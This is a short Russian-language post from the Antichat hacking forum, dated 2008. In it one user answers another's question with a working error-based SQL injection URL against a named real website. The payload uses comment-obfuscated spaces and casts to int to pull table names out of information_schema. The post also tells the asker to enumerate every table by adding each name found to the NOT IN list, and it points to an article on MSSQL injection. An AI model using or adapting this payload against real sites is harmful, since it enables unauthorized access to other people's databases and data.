21.01.2008, 23:12
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от PunkAss
отлично, спс  а можно этот запрос составить так, чтобы узнать какие ещё есть таблицы, а то тут только селект по одной таблице получается... вот смотри:
Код:
http://cleverclub.nashe.ru/rating_d.asp?sender=1'/**/or/**/cast((SELECT/**/TOP/**/1/**/table_name/**/From/**/information_schema.tables/**/where/**/table_name/**/not/**/in/**/('Rating1','HelpMessage'))/**/as/**/int)='1
в скобки, которые после not in подставляй очередное полученное имя таблицы и таким образом перебирай имена всех таблиц, а вобще почитай вот эту статью: Провидение Иньекций в MSSQL сервер от Microsoft
__________________
Карфаген должен быть разрушен...
|
|
|